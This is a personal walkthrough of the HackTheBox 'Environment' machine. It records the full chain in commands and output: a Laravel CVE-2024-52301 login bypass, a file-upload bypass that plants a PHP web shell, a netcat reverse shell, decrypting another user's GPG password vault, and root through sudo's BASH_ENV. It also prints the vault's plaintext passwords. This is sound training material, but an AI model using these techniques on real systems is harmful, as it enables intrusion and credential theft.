Here is my note on ENVIRONMENT box from Hackthebox.
ENVIRONMENT: 10.129.87.60
nmapAutomator.sh --host 10.129.87.60 --type All
sudo autorecon 10.129.87.60 --vhost-enum.hostname environment.htb --vhost-enum.wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --vhost-enum.threads 5 --global.domain environment.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 5c023395ef44e280cd3a960223f19264 (ECDSA)
|_ 256 1f3dc2195528a17759514810c44b74ab (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Did not follow redirect to http://environment.htb
dirsearch -u http://environment.htb/
[18:42:01] Starting:
[18:42:05] 403 - 555B - /%2e%2e;/test
[18:42:55] 403 - 555B - /admin/.config
[18:43:26] 403 - 555B - /admpar/.ftppass
[18:43:26] 403 - 555B - /admrev/.ftppass
[18:43:41] 403 - 555B - /bitrix/.settings.php.bak
[18:43:41] 403 - 555B - /bitrix/.settings
[18:43:41] 403 - 555B - /bitrix/.settings.bak
[18:43:45] 403 - 555B - /build/
[18:43:46] 301 - 169B - /build -> http://environment.htb/build/
[18:44:39] 403 - 555B - /ext/.deps
[18:44:41] 200 - 0B - /favicon.ico
[18:45:10] 200 - 2KB - /index.php/login/
[18:45:23] 403 - 555B - /lib/flex/uploader/.project
[18:45:23] 403 - 555B - /lib/flex/uploader/.actionScriptProperties
[18:45:23] 403 - 555B - /lib/flex/uploader/.flexProperties
[18:45:23] 403 - 555B - /lib/flex/uploader/.settings
[18:45:23] 403 - 555B - /lib/flex/varien/.actionScriptProperties
[18:45:23] 403 - 555B - /lib/flex/varien/.flexLibProperties
[18:45:23] 403 - 555B - /lib/flex/varien/.settings
[18:45:23] 403 - 555B - /lib/flex/varien/.project
[18:45:28] 200 - 2KB - /login
[18:45:29] 200 - 2KB - /login/
[18:45:31] 302 - 358B - /logout -> http://environment.htb/login
[18:45:32] 302 - 358B - /logout/ -> http://environment.htb/login
[18:45:34] 403 - 555B - /mailer/.env
[18:46:44] 403 - 555B - /resources/sass/.sass-cache/
[18:46:44] 403 - 555B - /resources/.arch-internal-preview.css
[18:46:46] 200 - 24B - /robots.txt
[18:47:12] 301 - 169B - /storage -> http://environment.htb/storage/
[18:47:12] 403 - 555B - /storage/
[18:47:30] 403 - 555B - /twitter/.env
[18:47:37] 405 - 245KB - /upload
[18:47:37] 405 - 245KB - /upload/
[18:47:42] 403 - 555B - /vendor/
Production v1.1
#No robots.txt
http://environment.htb/upload - 405 Method Not Allowed.
CVE-2024-52301 Laravel Notes:
PHP 8.2.28 — Laravel 11.30.0
[Target]: http://environment.htb
[~] Application Fingerprint
[HTTP STATUS]: 200
[Server]: nginx/1.22.1
[Common Laravel Cookie]: XSRF-TOKEN: eyJpdiI6ImVXTkh2U2hX...
[Common Laravel Cookie]: laravel_session: eyJpdiI6IlVtemsyYXdn...
[INFO]: Application running in Debug Mode (got via HTTP Method not allowed)
It's vulnerable to CVE-2024-52301
https://github.com/Nyamort/CVE-2024-52301
http://environment.htb/?--env=qwop
-It works but it changed to QWOP v1.1 at the end with environment.htb C 2025.
_token=DjIz8KhesjWamInZfhrIFwoxnQJ90Da3V6jl4UVW&email=qwop%40qwop.com&password=qwop&remember=True or False.
#Try to change remember=True to Test to get the error on purpose.
The error give us a leak source code of /login.
If the website gave you an error ? That's a good thing because it could leads to be a leaked source code or any information that could be used for further enumeration.
/login error page:
routes/web.php:
$keep_loggedin = False;
} elseif ($remember == 'True') {
$keep_loggedin = True;
}
if($keep_loggedin !== False) {
// TODO: Keep user logged in if he selects "Remember Me?"
}
if(App::environment() == "preprod") { //QOL: login directly as me in dev/local/preprod envs
$request->session()->regenerate();
$request->session()->put('user_id', 1);
return redirect('/management/dashboard');
}
$user = User::where('email', $email)->first();
http://environment.htb/login?--env=preprod #Login with BurpSuite Request instead !
#Modified the login parameter to /login?--env=preprod and forwarded the request.
IT WORKS ! We bypass the login page and it leads to /management/dashboard.
/management/profile:
ENVIRONMENT-HTB File Upload Bypass Example:
File Upload Bypass as usual ?
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
As usual with intruder to a regular png file.
php3 works !
CONTENT-TYPE: image/png
/storage/files/shell.png.php3
shell.png.php3:
GIF8
<?php
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
[SNIP]
http://environment.htb/storage/files/shell.png.php3
Works but it's only download the file instead of executing it.
┌──(root㉿kali)-[/home/kali/BOXES/ENVIRONMENT]
└─# cat shell.gif.php
GIF89a
<?php system($_GET["cmd"]); ?>
If we try to upload it, the file does indeed bypass the “image only” check, but going to the file’s URL, it doesn’t seems to be executing the revshell.
After more attempts and paying more attention to how the upload function manipulates the file and generates the URL, we find that the extension that works is: .php..
Adding the final dot to the file extension will bypass completely the upload function and allow us to execute the reverse shell.
shell.gif.php.
┌──(root㉿kali)-[/home/kali/CBBH-EXAM]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.174] from (UNKNOWN) [10.129.87.60] 56306
bash: cannot set terminal process group (929): Inappropriate ioctl for device
bash: no job control in this shell
www-data@environment:~/app/storage/app/public/files$ whoami
whoami
www-data
www-data@environment:~/app/storage/app/public/files$ hostname
hostname
environment
USER-SHELL !
www-data@environment:/home/hish$ whoami
whoami
www-data
www-data@environment:/home/hish$ hostname
hostname
environment
www-data@environment:/home/hish$ ls
ls
backup
user.txt
www-data@environment:/home/hish$ cat user.txt
cat user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
www-data -> hish:
www-data@environment:/home/hish/backup$ pwd
/home/hish/backup
www-data@environment:/home/hish/backup$ ls
ls
keyvault.gpg
www-data@environment:/home/hish/backup$ file keyvault.gpg
file keyvault.gpg
keyvault.gpg: PGP RSA encrypted session key - keyid: B755B0ED D6CFCFD3 RSA (Encrypt or Sign) 2048b .
www-data@environment:/home/hish$ ls -lah
ls -lah
total 36K
drwxr-xr-x 5 hish hish 4.0K Apr 11 00:51 .
drwxr-xr-x 3 root root 4.0K Jan 12 2025 ..
lrwxrwxrwx 1 root root 9 Apr 7 19:29 .bash_history -> /dev/null
-rw-r--r-- 1 hish hish 220 Jan 6 2025 .bash_logout
-rw-r--r-- 1 hish hish 3.5K Jan 12 2025 .bashrc
drwxr-xr-x 4 hish hish 4.0K Aug 30 06:12 .gnupg
drwxr-xr-x 3 hish hish 4.0K Jan 6 2025 .local
-rw-r--r-- 1 hish hish 807 Jan 6 2025 .profile
drwxr-xr-x 2 hish hish 4.0K Jan 12 2025 backup
-rw-r--r-- 1 root hish 33 Aug 30 00:22 user.txt
www-data@environment:/home/hish$ cp -r .gnupg /tmp
cp -r .gnupg /tmp
gpg --homedir /tmp/.gnupg --list-secret-keys
gpg --homedir /tmp/.gnupg --output juicy_decrypted.txt --decrypt keyvault.gpg
www-data@environment:/tmp$ gpg --homedir /tmp/.gnupg --list-secret-keys
gpg --homedir /tmp/.gnupg --list-secret-keys
gpg: WARNING: unsafe permissions on homedir '/tmp/.gnupg'
/tmp/.gnupg/pubring.kbx
-----------------------
sec rsa2048 2025-01-11 [SC]
F45830DFB638E66CD8B752A012F42AE5117FFD8E
uid [ultimate] hish_ <hish@environment.htb>
ssb rsa2048 2025-01-11 [E]
www-data@environment:/tmp$ gpg --homedir /tmp/.gnupg --output juicy_decrypted.txt --decrypt keyvault.gpg
<--output juicy_decrypted.txt --decrypt keyvault.gpg
gpg: WARNING: unsafe permissions on homedir '/tmp/.gnupg'
gpg: encrypted with 2048-bit RSA key, ID B755B0EDD6CFCFD3, created 2025-01-11
"hish_ <hish@environment.htb>"
www-data@environment:/tmp$
www-data@environment:/tmp$ ls
ls
juicy_decrypted.txt
keyvault.gpg
systemd-private-1a51fb1ba6474c2abf428e86482e729a-systemd-logind.service-bjkXGi
systemd-private-1a51fb1ba6474c2abf428e86482e729a-systemd-timesyncd.service-60cPok
vmware-root_544-2991268551
www-data@environment:/tmp$ cat juicy_decrypted.txt
cat juicy_decrypted.txt
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!
www-data@environment:/tmp$ ls -lah
ls -lah
total 48K
drwxrwxrwt 10 root root 4.0K Aug 30 06:13 .
drwxr-xr-x 18 root root 4.0K Apr 30 00:31 ..
drwxrwxrwt 2 root root 4.0K Aug 30 00:20 .ICE-unix
drwxrwxrwt 2 root root 4.0K Aug 30 00:20 .X11-unix
drwxrwxrwt 2 root root 4.0K Aug 30 00:20 .XIM-unix
drwxrwxrwt 2 root root 4.0K Aug 30 00:20 .font-unix
drwxr-xr-x 4 www-data www-data 4.0K Aug 30 06:13 .gnupg
-rw-r--r-- 1 www-data www-data 107 Aug 30 06:13 juicy_decrypted.txt
-rw-r--r-- 1 www-data www-data 430 Aug 30 06:09 keyvault.gpg
drwx------ 3 root root 4.0K Aug 30 00:20 systemd-private-1a51fb1ba6474c2abf428e86482e729a-systemd-logind.service-bjkXGi
drwx------ 3 root root 4.0K Aug 30 00:20 systemd-private-1a51fb1ba6474c2abf428e86482e729a-systemd-timesyncd.service-60cPok
drwx------ 2 root root 4.0K Aug 30 00:22 vmware-root_544-2991268551
www-data@environment:/tmp$ gpg --homedir /tmp/.gnupg --list-secret-keys
gpg --homedir /tmp/.gnupg --list-secret-keys
gpg: WARNING: unsafe permissions on homedir '/tmp/.gnupg'
/tmp/.gnupg/pubring.kbx
-----------------------
sec rsa2048 2025-01-11 [SC]
F45830DFB638E66CD8B752A012F42AE5117FFD8E
uid [ultimate] hish_ <hish@environment.htb>
ssb rsa2048 2025-01-11 [E]
www-data@environment:/tmp$ gpg --homedir /tmp/.gnupg --output juicy_decrypted.txt --decrypt keyvault.gpg
<--output juicy_decrypted.txt --decrypt keyvault.gpg
gpg: WARNING: unsafe permissions on homedir '/tmp/.gnupg'
gpg: encrypted with 2048-bit RSA key, ID B755B0EDD6CFCFD3, created 2025-01-11
"hish_ <hish@environment.htb>"
gpg: cannot open '/dev/tty': No such device or address
www-data@environment:/tmp$ cat juicy_decrypted.txt
cat juicy_decrypted.txt
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!! #hish credential !
FACEBOOK.COM -> summerSunnyB3ACH!!
hish:marineSPm@ster!!
www-data@environment:/tmp$ su - hish
su - hish
Password: marineSPm@ster!!
id
uid=1000(hish) gid=1000(hish) groups=1000(hish),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth)
whoami
hish
hostname
environment
HISH USER-SHELL !
hish -> root:
ENV_KEEP+="ENV BASH_ENV" PRIV ESC Notes:
python3 -c 'import pty; pty.spawn("/bin/bash")'
hish@environment:~$ sudo -l
sudo -l
[sudo] password for hish: Ihaves0meMon$yhere123
Sorry, try again.
[sudo] password for hish: marineSPm@ster!!
Matching Defaults entries for hish on environment:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
env_keep+="ENV BASH_ENV", use_pty
User hish may run the following commands on environment:
(ALL) /usr/bin/systeminfo
env_keep+="ENV BASH_ENV" = Looks Interesting ?
hish@environment:/tmp$ sudo -l
sudo -l
Matching Defaults entries for hish on environment:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
env_keep+="ENV BASH_ENV", use_pty
User hish may run the following commands on environment:
(ALL) /usr/bin/systeminfo
hish@environment:/tmp$ echo '/bin/bash' > /tmp/root.sh
echo '/bin/bash' > /tmp/root.sh
hish@environment:/tmp$ chmod +x /tmp/root.sh
chmod +x /tmp/root.sh
hish@environment:/tmp$ export BASH_ENV=/tmp/root.sh
export BASH_ENV=/tmp/root.sh
sudo /usr/bin/systeminfo
root@environment:/tmp# whoami
whoami
root
root@environment:/tmp# hostname
hostname
environment
root@environment:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
ROOT-SHELL !
root@environment:~# whoami
whoami
root
root@environment:~# hostname
hostname
environment
root@environment:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@environment:~# ls
ls
root.txt scripts
root@environment:~# cat root.txt
cat root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel